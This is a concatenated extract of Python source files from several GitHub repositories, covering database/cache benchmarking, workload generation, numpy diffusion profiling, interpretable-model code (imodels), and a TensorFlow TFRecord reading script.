csv_file = "data/res/res.csv"
try:
with open(csv_file, 'a', newline='') as p: # a means append
writer = csv.DictWriter(p, fieldnames=res_columns)
if os.stat(csv_file).st_size == 0: # if csv_file is empty, then add the header
writer.writeheader()
for data in dict_data:
writer.writerow(data)
except IOError:
print("I/O error")
print('ALG Total Time: {}'.format(seq_end_time - seq_start_time))
# TODO: calculate throughput, save algorithm simulation result
class SystemOperator:
"""Operate DB and cache based on operations in queue."""
def __init__(self, db_conn_param: dict, cache_conn_param: dict) -> None:
self.db_sys = db_conn_param["db"]
del db_conn_param['db']
if self.db_sys == "postgresql":
self.db_conn = psycopg2.connect(**db_conn_param)
self.db_conn.set_session(autocommit=False)
self.db_cursor = self.db_conn.cursor()
else:
assert self.db_sys == "hbase"
# self.db_conn = happybase.Connection(host=db_conn_param["host"], port=db_conn_param["port"])
self.db_conn = happybase.Connection(host=db_conn_param["host"], port=9090)
self.table = self.db_conn.table('usertable')
self.cache_sys = cache_conn_param["cache"]
del cache_conn_param['cache']
if self.cache_sys == "memcached":
self.cache_client = base.Client((cache_conn_param['host'], int(cache_conn_param['port'])))
# self.cache_client = PooledClient(('127.0.0.1', int(cache_conn_param['port'])), max_pool_size = 400)
self.cache_client.flush_all()
def operation_exe(self, op_queue: Queue):
"""Get operations from queue, execute them."""
counter = 0
db_read_time, db_write_time, cache_read_time, cache_write_time = 0, 0, 0, 0
cache_counter = 0
        cache_list = []
        sys_start_time = None  # set when the first operation is dequeued
while True:
            op_dict = op_queue.get()  # blocks until a value is available in the queue
if op_dict is None:
print('counter: {}'.format(counter))
print("cache_counter:", cache_counter)
sys_end_time = time.time()
if sys_start_time is not None:
print('System Execution Time: {}'.format(sys_end_time - sys_start_time))
print('db_read_time: {}, db_write_time: {}'.format(db_read_time, db_write_time))
print('cache_read_time: {}, cache_write_time: {}'.format(cache_read_time, cache_write_time))
break
else:
if counter == 0:
sys_start_time = time.time()
if 'db_write' in op_dict:
db_write_time += self.db_write_txn(op_dict['db_write'], op_dict['db_write_key'])
if 'acc_update' in op_dict:
db_read_time += self.load_to_cache(op_dict['acc_update'], op_dict['acc_update_key'])
if 'cache_evict' in op_dict:
tmp_start_time = time.time()
self.cache_client.delete_many(op_dict['cache_evict'])
cache_write_time += time.time() - tmp_start_time
if 'read_on_miss' in op_dict:
db_read_time += self.load_to_cache(op_dict['read_on_miss'], op_dict['read_on_miss_key'])
if 'read_on_abort' in op_dict:
db_read_time += self.load_to_cache(op_dict['read_on_abort'], op_dict['read_on_abort_key'])
if 'cache_read' in op_dict:
cache_counter += 1
cache_list.append(op_dict['cache_read'][0])
                    # submit cached reads in batches
if (counter%100==0):
# print("*"*100)
tmp_start_time = time.time()
self.cache_client.get_many(cache_list)
cache_read_time += time.time() - tmp_start_time
#tmp_start_time = time.time()
#self.cache_client.get_many(op_dict['cache_read']) # the type of op_dict['cache_read'] is list
#print('each get memcache time: {}, counter: {}'.format(time.time() - tmp_start_time, counter))
#if (time.time() - tmp_start_time>0.02):
# cache_counter+=1
#cache_read_time += time.time() - tmp_start_time
counter += 1
def load_to_cache(self, query_list: list, key_str_list: list):
"""Execute read transaction at database and load results to cache."""
tmp_load_start_time = time.time()
if self.db_sys == "postgresql":
try:
txn_res_list = []
for query_str in query_list:
self.db_cursor.execute(query_str)
txn_res_list.extend(self.db_cursor.fetchall())
self.db_conn.commit()
for query_result in txn_res_list:
self.cache_client.set(query_result[0], ''.join(query_result[1:]))
except psycopg2.DatabaseError as e:
print('PostgreSQL read transaction execution error')
self.db_conn.rollback()
else: # HBase read transaction
try:
txn_res_list = []
for (key_str, qual_bytes_list) in zip(key_str_list, query_list):
row = self.table.row(key_str.encode('utf-8'), columns=qual_bytes_list)
txn_res_list.append((key_str, b''.join(row.values()).decode('utf-8')))
self.cache_client.set_many(dict(txn_res_list))
except ValueError:
print('HBase value error.')
pass
tmp_load_end_time = time.time()
return tmp_load_end_time - tmp_load_start_time
def db_write_txn(self, query_list: list, key_str_list: list):
"""Execute write transaction at database."""
tmp_write_start_time = time.time()
if self.db_sys == "postgresql": # postgresql write transaction
try:
for query_str in query_list:
self.db_cursor.execute(query_str)
self.db_conn.commit()
except psycopg2.DatabaseError as e:
print('PostgreSQL write transaction execution error')
self.db_conn.rollback()
else: # HBase write transaction
try:
with self.table.batch(transaction=True) as bat:
for (key_str, qual_val_dict) in zip(key_str_list, query_list):
bat.put(key_str.encode('utf-8'), qual_val_dict)
# TODO: check error handling here
except ValueError:
print('HBase value error.')
pass
tmp_write_end_time = time.time()
return tmp_write_end_time - tmp_write_start_time
def cleanup(self):
"""Close connection after testing."""
self.db_conn.close()
self.cache_client.flush_all()
self.cache_client.close()
```
#### File: cc_cache/utils/PointWrt_ds_generator.py
```python
import yaml
import argparse
import numpy as np
from numpy.random import default_rng
import random
import math
import pickle
import pdb
import scipy.stats as stats
from os.path import dirname
from os.path import abspath
from pathlib import Path
def genr_item_univ(config: dict, size_res_path='data/item_size.pkl', cls_res_path='data/cls_item.pkl'):
"""Generate universe of items (queries).
Generate and save result as <Item Size Table>. Item number and size range
specified by params in config. Compute and save <Class Item Table> based on
<Item Size Table> result.
Args:
config: dict, params parsed from input_params.yaml file
size_res_path: str, file path to save <Item Size Table> dict
cls_res_path: str, file path to save <Class Item Table> dict
Returns:
a dict mapping item id to item size,
another dict mapping class id to class vector (binary/boolean)
showing which items are in each class.
Raises:
ValueError: Undefined item distribution.
"""
item_size_dict = {}
# cls_num = config['item_cls_num']
item_num = config['item_num']
item_min_size = config['item_min_size'] # s0, minimum item size
item_max_size = config['item_max_size'] # s1, maximum item size
if config['item_distr'] == 'cls_norm':
# assert item_num % cls_num == 0 # each class contains same number of items
print('Generating item universe in cls_norm distribution.')
mu = (item_min_size + item_max_size) / 2 # adopt mean value of minimum and maximum size as mu
sigma = (mu - item_min_size) / 4 # adopt 4 std, guarantee 99.99% size greater than item_min_size and smaller than item_max_size
# random numbers satisfying normal distribution
rng = stats.truncnorm(
(item_min_size - mu) / sigma, (item_max_size - mu) / sigma, loc=mu, scale=sigma)
item_size_arr = np.around(rng.rvs(item_num), 0)
np.random.shuffle(item_size_arr)
for j in range(item_num):
item_size_dict[j] = item_size_arr[j]
elif config['item_distr'] == 'cls_random':
rng = default_rng(216) # set random seed
item_size_arr = rng.integers(low=item_min_size, high=item_max_size + 1, size=item_num)
np.random.shuffle(item_size_arr)
for j in range(item_num):
item_size_dict[j] = item_size_arr[j]
elif config['item_distr'] == 'uni_size':
assert item_min_size == item_max_size
for j in range(item_num):
item_size_dict[j] = item_min_size
else:
raise ValueError('Undefined item distribution.')
print('Item Size Dict: \n {}'.format(item_size_dict))
# generate cls_item
cls_item_fp = open(size_res_path, 'wb')
pickle.dump(item_size_dict, cls_item_fp)
cls_item_fp.close()
# compute cls_item_dict based on item_size_dict
cls_item_dict = {}
if config['item_distr'] == 'uni_size':
cls_num = 1
else:
cls_num = math.ceil(math.log2(item_max_size / item_min_size))
for cls_id in range(cls_num):
cls_item_dict[cls_id] = np.zeros(item_num, dtype=bool)
# check each item size and update class binary vector
for item_id in range(item_num):
item_cls = math.floor(math.log2(item_size_dict[item_id] / item_min_size))
cls_item_dict[item_cls][item_id] = 1
# dump <Class Item Table> using pickle
cls_item_fp = open(cls_res_path, 'wb')
pickle.dump(cls_item_dict, cls_item_fp)
cls_item_fp.close()
return item_size_dict, cls_item_dict
def genr_txn_seq(config: dict, txn_item_path='data/txn_item.pkl', id_seq_path='data/id_seq.npy', flag_seq_path='data/flag_seq.npy'):
"""Generate transaction sequence for point-write workload.
"""
# generate read-write flag based on write frequency
seq_len = config['seq_len'] # transaction sequence length
write_freq = config['write_freq'] # expected write transaction frequency
rng = default_rng(522)
flag_arr = rng.random(seq_len)
write_flag_seq = flag_arr < write_freq
np.save(flag_seq_path, write_flag_seq) # save to numpy file
# create read / write transactions based on recent read / write queries
item_num = config['item_num']
recent_read_thresh, recent_write_thresh = config['recent_read_thresh'], config['recent_write_thresh']
read_txn_size, write_txn_size = config['read_txn_size'], config['write_txn_size']
txn_vec_set = set() # store frozenset representing unique transactions
unique_txn_cnt = 0 # unique transaction count, serve as transaction id during generation
txn_item_dict = {} # map transaction id to transaction item vector
txn_id_seq = np.zeros(seq_len, dtype=int) # transaction id sequence
for i in range(seq_len):
# generate write transaction
if write_flag_seq[i]:
            # check if there are enough 'recent read transactions' to select write queries
past_reads = np.where(write_flag_seq[0:i+1] == 0)[0]
if past_reads.shape[0] >= recent_read_thresh:
recent_reads = past_reads[-recent_read_thresh:past_reads.shape[0]]# find recent read queries
recent_read_id = txn_id_seq[recent_reads]
recent_read_queries = np.zeros(item_num, dtype=bool)
for txn_id in recent_read_id:
recent_read_queries = np.logical_or(recent_read_queries, txn_item_dict[txn_id])
non_recent_read_queries = np.logical_not(recent_read_queries)
# choose 1 query from non-recent read queries, another from recent read queries
if write_txn_size == 2:
recent_num, non_recent_num = 1, 1
else:
# TODO: fix this 50/50 setup
recent_num, non_recent_num = math.ceil(write_txn_size * 0.5), math.floor(write_txn_size * 0.5)
recent_samples = rng.choice(np.where(recent_read_queries == 1)[0], recent_num)
non_recent_samples = rng.choice(np.where(non_recent_read_queries == 1)[0], non_recent_num)
samples = np.concatenate((recent_samples, non_recent_samples))
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# not enough recent read transactions, choose write queries randomly
else:
samples = rng.choice(item_num, write_txn_size) # choose queries by random
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# generate read transaction
else:
past_writes = np.where(write_flag_seq[0:i+1] == 1)[0]
if past_writes.shape[0] >= recent_write_thresh:
recent_writes = past_writes[-recent_write_thresh:past_writes.shape[0]]# find recent write queries
recent_write_id = txn_id_seq[recent_writes]
recent_write_queries = np.zeros(item_num, dtype=bool)
for txn_id in recent_write_id:
recent_write_queries = np.logical_or(recent_write_queries, txn_item_dict[txn_id])
non_recent_write_queries = np.logical_not(recent_write_queries)
# choose 2 queries from non_recent_write, others from recent_write
recent_num, non_recent_num = read_txn_size - 2, 2
recent_samples = rng.choice(np.where(recent_write_queries == 1)[0], recent_num)
non_recent_samples = rng.choice(np.where(non_recent_write_queries == 1)[0], non_recent_num)
samples = np.concatenate((recent_samples, non_recent_samples))
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# not enough recent write transactions, choose read queries randomly
else:
samples = rng.choice(item_num, read_txn_size) # choose queries by random
tmp_txn_vec = np.zeros(item_num, dtype=bool)
for item_id in samples:
tmp_txn_vec[item_id] = 1
tmp_item_set = frozenset(samples)
if tmp_item_set not in txn_vec_set:
txn_vec_set.add(tmp_item_set)
tmp_txn_id = unique_txn_cnt
txn_id_seq[i] = tmp_txn_id
txn_item_dict[tmp_txn_id] = tmp_txn_vec
unique_txn_cnt += 1
else:
for txn_id in txn_item_dict:
if np.equal(tmp_txn_vec, txn_item_dict[txn_id]).all():
txn_id_seq[i] = txn_id
break
# save results to file
txn_item_fp = open(txn_item_path, 'wb')
pickle.dump(txn_item_dict, txn_item_fp)
txn_item_fp.close()
np.save(id_seq_path, txn_id_seq)
np.save(flag_seq_path, write_flag_seq)
return txn_item_dict, txn_id_seq, write_flag_seq
if __name__ == '__main__':
path = abspath(dirname(dirname(__file__)))+'/config/PointWrt.yaml'
config_file = open(path, 'r')
config_dict = yaml.load(config_file, Loader=yaml.FullLoader)
workload_dir = abspath(dirname(dirname(__file__))) + '/data/PointWrt/' + 'QueryNum{}_Unisize_RThresh{}_WThresh{}_RSize{}_WSize{}_Wrt{}_Len{}'.format(config_dict['item_num'], config_dict['recent_read_thresh'], config_dict['recent_write_thresh'], config_dict['read_txn_size'], config_dict['write_txn_size'], config_dict['write_freq'], config_dict['seq_len'])
Path(workload_dir).mkdir(parents=True, exist_ok=True)
item_size_dict, cls_item_dict = genr_item_univ(config_dict, size_res_path=workload_dir+'/item_size.pkl', cls_res_path=workload_dir+'/cls_item.pkl')
txn_item_dict, txn_id_seq, write_flag_seq = genr_txn_seq(config_dict, txn_item_path=workload_dir+'/txn_item.pkl', id_seq_path=workload_dir+'/id_seq.npy', flag_seq_path=workload_dir+'/flag_seq.npy')
``` |
{
"source": "jiayoustone/high_performance_python",
"score": 3
} |
#### File: 06_matrix/diffusion_1d/diffusion_numpy_memory.py
```python
import numpy as np
import time
grid_size = (512,)
@profile
def laplacian(grid, out):
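    # Second-order central difference of a periodic 1-D grid, computed with
    # in-place numpy ops into `out` so the hot loop avoids extra allocations
    # (apart from the temporaries created by np.roll).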
np.copyto(out, grid)
np.multiply(out, -2.0, out)
np.add(out, np.roll(grid, +1), out)
np.add(out, np.roll(grid, -1), out)
@profile
def evolve(grid, dt, out, D=1):
laplacian(grid, out)
np.multiply(out, D * dt, out)
np.add(out, grid, out)
def run_experiment(num_iterations):
scratch = np.zeros(grid_size)
grid = np.zeros(grid_size)
block_low = int(grid_size[0] * .4)
block_high = int(grid_size[0] * .5)
grid[block_low:block_high] = 0.005
start = time.time()
for i in range(num_iterations):
evolve(grid, 0.1, scratch)
grid, scratch = scratch, grid
return time.time() - start
if __name__ == "__main__":
run_experiment(500)
```
#### File: jiayoustone/high_performance_python/nrange.py
```python
def nrange(start, stop, step=1):
while start < stop:
yield start
start += step
@profile
def ncall():
for i in nrange(1,1000000):
pass
if __name__ == "__main__":
ncall()
``` |
{
"source": "jiayouwyhit/imodels",
"score": 3
} |
#### File: imodels/algebraic/slim.py
```python
import cvxpy as cp # package for optimization
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.linear_model import LinearRegression, Lasso
class SLIMRegressor(BaseEstimator):
'''Sparse integer linear model
'''
def __init__(self):
self.model = LinearRegression()
self.predict = self.model.predict
def fit(self, X, y, lambda_reg=10, sample_weight=None):
        '''fit a linear model with integer coefficients and L1 regularization.
In case the optimization fails, fit lasso and round coefs.
Params
------
sample_weight: np.ndarray (n,)
weight for each individual sample
'''
if 'pandas' in str(type(X)):
X = X.values
if 'pandas' in str(type(y)):
y = y.values
assert type(X) == np.ndarray, 'inputs should be ndarrays'
assert type(y) == np.ndarray, 'inputs should be ndarrays'
# declare the integer-valued optimization variable
w = cp.Variable(X.shape[1], integer=True)
# set up the minimization problem
residuals = X @ w - y
if sample_weight is not None:
# print('shapes', residuals.shape, sample_weight.shape)
residuals = cp.multiply(sample_weight, residuals)
try:
mse = cp.sum_squares(residuals)
l1_penalty = lambda_reg * cp.norm(w, 1)
obj = cp.Minimize(mse + l1_penalty)
prob = cp.Problem(obj)
# solve the problem using an appropriate solver
prob.solve()
            self.model.coef_ = w.value.astype(int)  # np.int was removed from recent NumPy; plain int is equivalent
self.model.intercept_ = 0
        except Exception:  # solver unavailable or failed: fall back to rounded Lasso coefficients
m = Lasso(alpha=lambda_reg)
m.fit(X, y, sample_weight=sample_weight)
            self.model.coef_ = np.round(m.coef_).astype(int)
self.model.intercept_ = m.intercept_
def predict_proba(self, X):
preds = self.predict(X)
preds_proba = np.array([1 / (1 + np.exp(-y)) for y in preds])
return np.vstack((1 - preds_proba, preds_proba)).transpose()
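# --- Illustrative usage sketch (not from the original package) ---
# Fits the sparse integer model on a tiny synthetic regression problem; if no
# mixed-integer cvxpy solver is available, fit() falls back to rounded Lasso
# coefficients, so the printed coefficients are integers either way.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    X_demo = rng.randn(100, 3)
    y_demo = X_demo @ np.array([3.0, -2.0, 0.0]) + 0.1 * rng.randn(100)
    m = SLIMRegressor()
    m.fit(X_demo, y_demo, lambda_reg=1)
    print("integer coefficients:", m.model.coef_)
    print("first predictions:", m.predict(X_demo[:3]))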
```
#### File: imodels/util/score.py
```python
from typing import List, Tuple
from warnings import warn
import pandas as pd
import numpy as np
from sklearn.utils import indices_to_mask
from sklearn.linear_model import Lasso, LogisticRegression
from sklearn.linear_model._coordinate_descent import _alpha_grid
from sklearn.model_selection import KFold
from imodels.util.rule import Rule
def score_precision_recall(X,
y,
rules: List[List[str]],
samples: List[List[int]],
features: List[List[int]],
feature_names: List[str],
oob: bool = True) -> List[Rule]:
scored_rules = []
for curr_rules, curr_samples, curr_features in zip(rules, samples, features):
# Create mask for OOB samples
mask = ~indices_to_mask(curr_samples, X.shape[0])
if sum(mask) == 0:
if oob:
warn(
"OOB evaluation not possible: doing it in-bag. Performance evaluation is likely to be wrong"
" (overfitting) and selected rules are likely to not perform well! Please use max_samples < 1."
)
mask = curr_samples
# XXX todo: idem without dataframe
X_oob = pd.DataFrame(
(X[mask, :])[:, curr_features],
columns=np.array(feature_names)[curr_features]
)
if X_oob.shape[1] <= 1: # otherwise pandas bug (cf. issue #16363)
return []
y_oob = y[mask]
y_oob = np.array((y_oob != 0))
# Add OOB performances to rules:
scored_rules += [
Rule(r, args=_eval_rule_perf(r, X_oob, y_oob))
for r in set(curr_rules)
]
return scored_rules
def _eval_rule_perf(rule: str, X, y) -> Tuple[float, float]:
detected_index = list(X.query(rule).index)
if len(detected_index) <= 1:
return (0, 0)
y_detected = y[detected_index]
true_pos = y_detected[y_detected > 0].sum()
if true_pos == 0:
return (0, 0)
pos = y[y > 0].sum()
return y_detected.mean(), float(true_pos) / pos
def score_lasso(X, y, rules: List[str], alphas=None, cv=3,
prediction_task='regression',
max_rules=2000, random_state=None) -> Tuple[List[Rule], List[float], float]:
if alphas is None:
if prediction_task == 'regression':
alphas = _alpha_grid(X, y)
elif prediction_task == 'classification':
alphas = [1 / alpha
for alpha in np.logspace(-4, 4, num=10, base=10)]
coef_zero_threshold = 1e-6 / np.mean(np.abs(y))
mse_cv_scores = []
nonzero_rule_coefs_count = []
kf = KFold(cv)
# alphas are sorted from most reg. to least reg.
for alpha in alphas:
if prediction_task == 'regression':
m = Lasso(alpha=alpha, random_state=random_state)
else:
m = LogisticRegression(penalty='l1', C=1/alpha, solver='liblinear')
mse_cv = 0
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
m.fit(X_train, y_train)
mse_cv += np.mean((m.predict(X_test) - y_test) ** 2)
m.fit(X, y)
rule_count = np.sum(np.abs(m.coef_.flatten()) > coef_zero_threshold)
if rule_count > max_rules:
break
nonzero_rule_coefs_count.append(rule_count)
mse_cv_scores.append(mse_cv / cv)
best_alpha = alphas[np.argmin(mse_cv_scores)]
if prediction_task == 'regression':
lscv = Lasso(alpha=best_alpha, random_state=random_state, max_iter=2000)
else:
lscv = LogisticRegression(penalty='l1', C=1/best_alpha, solver='liblinear',
random_state=random_state, max_iter=200)
lscv.fit(X, y)
coef_ = lscv.coef_.flatten()
coefs = list(coef_[:-len(rules)])
support = np.sum(X[:, -len(rules):], axis=0) / X.shape[0]
nonzero_rules = []
for r, w, s in zip(rules, coef_[-len(rules):], support):
if abs(w) > coef_zero_threshold:
nonzero_rules.append(Rule(r, args=[w], support=s))
coefs.append(w)
return nonzero_rules, coefs, lscv.intercept_
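# --- Illustrative usage sketch (not from the original package) ---
# _eval_rule_perf() scores a single rule string against a DataFrame, returning
# (mean label of the rows the rule covers, recall of the positive labels).
# The feature names and the rule below are made up for this demo.
if __name__ == "__main__":
    X_demo = pd.DataFrame({"age": [25, 40, 60, 35], "bmi": [22.0, 31.5, 28.0, 24.0]})
    y_demo = np.array([0, 1, 1, 0])
    print(_eval_rule_perf("age > 30 and bmi > 25", X_demo, y_demo))  # -> (1.0, 1.0)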
```
#### File: imodels/tests/brl_test.py
```python
import unittest
from urllib.request import urlretrieve
import numpy as np
from scipy.io.arff import loadarff
from sklearn.model_selection import train_test_split
from imodels.rule_list.bayesian_rule_list.bayesian_rule_list import BayesianRuleListClassifier
import os
path_to_tests = os.path.dirname(os.path.realpath(__file__))
class TestBRL(unittest.TestCase):
def test_integration_stability(self):
'''Test on synthetic dataset
'''
X = [[0, 0, 1, 1, 0],
[1, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[1, 0, 0, 0, 0],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[0, 1, 1, 1, 1],
[1, 0, 1, 1, 1]]
y = [0, 0, 0, 0, 1, 1, 1, 1]
M = BayesianRuleListClassifier(minsupport=0.02)
feat = ['ft1', 'ft2', 'ft3', 'ft4', 'ft5']
M.fit(X, y, feature_labels=feat)
assert [M.predict([row], threshold=0.5) for row in X] == y
def test_integration_fitting(self):
'''Test on a real (small) dataset
'''
np.random.seed(13)
feature_labels = ["#Pregnant", "Glucose concentration test", "Blood pressure(mmHg)",
"Triceps skin fold thickness(mm)",
"2-Hour serum insulin (mu U/ml)", "Body mass index", "Diabetes pedigree function",
"Age (years)"]
data = loadarff(os.path.join(path_to_tests, "test_data/diabetes.arff"))
data_np = np.array(list(map(lambda x: np.array(list(x)), data[0])))
X, y_text = data_np[:, :-1].astype('float32'), data_np[:, -1].astype('str')
        y = (y_text == 'tested_positive').astype(int)  # labels 0-1
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.75) # split
# train classifier (allow more iterations for better accuracy; use BigDataRuleListClassifier for large datasets)
print('training...')
model = BayesianRuleListClassifier(max_iter=1000, listlengthprior=5, class1label="diabetes", verbose=False)
model.fit(X_train, y_train, feature_labels=feature_labels)
preds = model.predict(X_test, threshold=0.1)
print("RuleListClassifier Accuracy:", np.mean(y_test == preds), "Learned interpretable model:\n", model)
```
#### File: tests/notebooks/imodels_comparisons.py
```python
import pickle as pkl
import pandas as pd
import imodels
import itertools
import os
from imodels.util.evaluate.compare_models import run_comparison
from sklearn.metrics import accuracy_score, f1_score
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
import matplotlib.pyplot as plt
from tqdm import tqdm
# %load_ext autoreload
# %autoreload 2
# change working directory to project root
if os.getcwd().split('/')[-1] != 'imodels':
os.chdir('..')
MODEL_COMPARISON_PATH = 'tests/test_data/comparison_data/'
MODEL_COMPARISON_FILE = MODEL_COMPARISON_PATH + 'model_comparisons.pkl'
# %% [markdown]
# # compare static performance of different models
# %%
df = pkl.load(open(MODEL_COMPARISON_FILE, 'rb'))['df'].round(3)
print('columns', df.columns, 'models', df.index)
# %% [markdown]
# # complexity-vs-accuracy plots for each model
# %%
COMPARISON_DATASETS = [
("breast-cancer", 13),
("breast-w", 15),
("credit-g", 31),
("haberman", 43),
("heart", 1574),
("labor", 4),
("vote", 56),
]
METRICS = [
('Acc.', accuracy_score),
('Time', None),
('Complexity', None)
]
def get_comparison_df(estimators):
'''Get results for running multiple estimators
'''
estimator_name = estimators[0][0]
model_comparison_file = MODEL_COMPARISON_PATH + f'{estimator_name}_comparisons.pkl'
if os.path.isfile(model_comparison_file):
result = pkl.load(open(model_comparison_file, 'rb'))['df']
else:
result = run_comparison(COMPARISON_DATASETS, METRICS, estimators, write=False, average=True, verbose=False)
pkl.dump({'df': result}, open(model_comparison_file, 'wb'))
return result
def viz_model(result):
'''Plot acc vs complexity
'''
complexities = result[result.index.str.contains('Complexity')]
accuracies = result[result.index.str.contains('Acc')]
complexity_sort_indices = complexities.argsort()
plt.plot(complexities[complexity_sort_indices], accuracies[complexity_sort_indices])
plt.xlabel('Complexity score')
plt.ylabel('Average accuracy across comparison datasets')
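# Hypothetical standalone use of viz_model (the loop further below inlines the same logic):
#   viz_model(get_comparison_df(est_rf)); plt.show()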
# %% [markdown]
# ## Random Forest
# %%
est_rf = [
('random_forest', RandomForestClassifier(n_estimators=n, max_depth=d))
for n, d in itertools.product([2, 3, 4], [2, 3])
]
est_gb = [
('gradient_boosting', GradientBoostingClassifier(n_estimators=n, max_depth=d))
for n, d in itertools.product([2, 3, 4], [2, 3])
]
est_skope = [
('skope', imodels.SkopeRulesClassifier(n_estimators=n, max_depth=d))
for n, d in itertools.product([2, 4, 8, 16, 32, 64, 96], [2, 3])
]
est_rulefit = [
('rulefit', imodels.RuleFitClassifier(max_rules=n, tree_size=d))
for n, d in itertools.product([2, 4, 8, 16, 32, 48], [4, 8])
]
est_fplasso = [
('fplasso', imodels.FPLassoClassifier(max_rules=n, maxcardinality=c))
for n, c in itertools.product([2, 4, 8, 16, 32, 48, 96], [2, 3])
]
est_fpskope = [
('fpskope', imodels.FPSkopeClassifier(maxcardinality=c, max_depth_duplication=dd))
for c, dd in itertools.product([2, 3, 4], [1, 2, 3])
]
est_brl = [
('brl', imodels.BayesianRuleListClassifier(listlengthprior=l, maxcardinality=c))
for l, c in itertools.product([2, 4, 8, 16], [2, 3])
]
est_grl = [('grl', imodels.GreedyRuleListClassifier(max_depth=d)) for d in [2, 4, 8, 16]]
est_oner = [('oner', imodels.OneRClassifier(max_depth=d)) for d in [2, 3, 4, 5, 6, 7]]
est_brs = [('brs', imodels.BoostedRulesClassifier(n_estimators=n)) for n in [2, 4, 8, 16, 32]]
ests = [est_rf, est_gb, est_skope, est_rulefit, est_fplasso, est_fpskope, est_brl, est_grl, est_oner, est_brs]
plt.figure(dpi=250)
for est in tqdm(ests):
result = get_comparison_df(est)
complexities = result[result.index.str.contains('Complexity')]
accuracies = result[result.index.str.contains('Acc')]
complexity_sort_indices = complexities.argsort()
plt.plot(complexities[complexity_sort_indices],
accuracies[complexity_sort_indices], label=est[0][0].replace('_', ' '))
plt.xlabel('Complexity score')
plt.ylabel('Average accuracy across comparison datasets')
plt.legend(frameon=False, handlelength=1)
plt.show()
```
{
"source": "Jiayuan-Gu/face-project",
"score": 2
} |
#### File: Detection/code/data_test.py
```python
import os
import sys
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io as sio
import time
import logging
# import resfcn_input
# import resfcn_config as config
def main(argv=None): # pylint: disable=unused-argument
# images,labels,pos_ws,neg_ws,scan_names,z_indexs = resfcn_input.inputs()
# print('inputs initialize.')
data_dir = '/data-disk/gujy/Face/WF/tf_records'
recordName = os.listdir(data_dir)[int(argv[0])]
logFile = os.path.join('%s.log'%recordName)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%m-%d-%H:%M:%S',
filename=logFile,
filemode='w')
reader = tf.TFRecordReader()
_,serialized_example = reader.read(tf.train.string_input_producer([os.path.join(data_dir,recordName)]))
features = tf.parse_single_example(serialized_example,
features={
'image': tf.VarLenFeature(dtype=tf.float32),
'image_shape':tf.FixedLenFeature(shape=[3],dtype=tf.int64),
'label': tf.VarLenFeature(dtype=tf.float32),
'label_shape':tf.FixedLenFeature(shape=[3],dtype=tf.int64),
'name': tf.FixedLenFeature(shape=[],dtype=tf.string)
})
image = tf.cast(features['image'],tf.float32)
image_shape = tf.cast(features['image_shape'],tf.int32)
image = tf.sparse_tensor_to_dense(image)
image = tf.reshape(image,image_shape)
label = tf.cast(features['label'],tf.float32)
label_shape = tf.cast(features['label_shape'],tf.int32)
label = tf.sparse_tensor_to_dense(label)
label = tf.reshape(label,label_shape)
name = tf.cast(features['name'],tf.string)
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,gpu_options=tf.GPUOptions(allow_growth=True)))
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess,coord=coord)
for i in range(1000):
try:
# for i in range(100):
# sess_output = sess.run([images,labels,pos_ws,neg_ws,scan_names,z_indexs])
# #sess_output = sess.run([image,label,pos_w,neg_w,scan_name,z_index,image_shape,label_shape])
# #sess_output[0]=np.reshape(sess_output[0],sess_output[-2])
# #sess_output[1]=np.reshape(sess_output[1],sess_output[-1])
# plt.subplot(121)
# plt.imshow(sess_output[0][0,:,:,int(config.IMAGE_SIZE[-1]/2)])
# plt.subplot(122)
# plt.imshow(sess_output[1][0,:,:,int(config.LABEL_SIZE[-1]/2)])
# plt.show()
# print(sess_output[2])
# print(sess_output[3])
IMAGE,LABEL,NAME = sess.run([image,label,name])
print(NAME.decode())
except:
logging.error('%d'%i)
break
    # Stop the queue runners and close the session once the loop has finished.
    coord.request_stop()
    coord.join(threads)
    sess.close()
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = '4'
main(sys.argv[1:])
# img = 5*np.random.randn(5,5)+5;
# print(img)
# image = tf.constant(img)
# a = tf.clip_by_value(image,4,6)
# b = tf.image.adjust_brightness(a,-4)
# print('Begin.')
# os.environ['CUDA_VISIBLE_DEVICES'] = '0'
# init = tf.initialize_all_variables()
# sess = tf.Session(config=tf.ConfigProto(log_device_placement=False))
# sess.run(init)
# print(sess.run([a,b]))
```
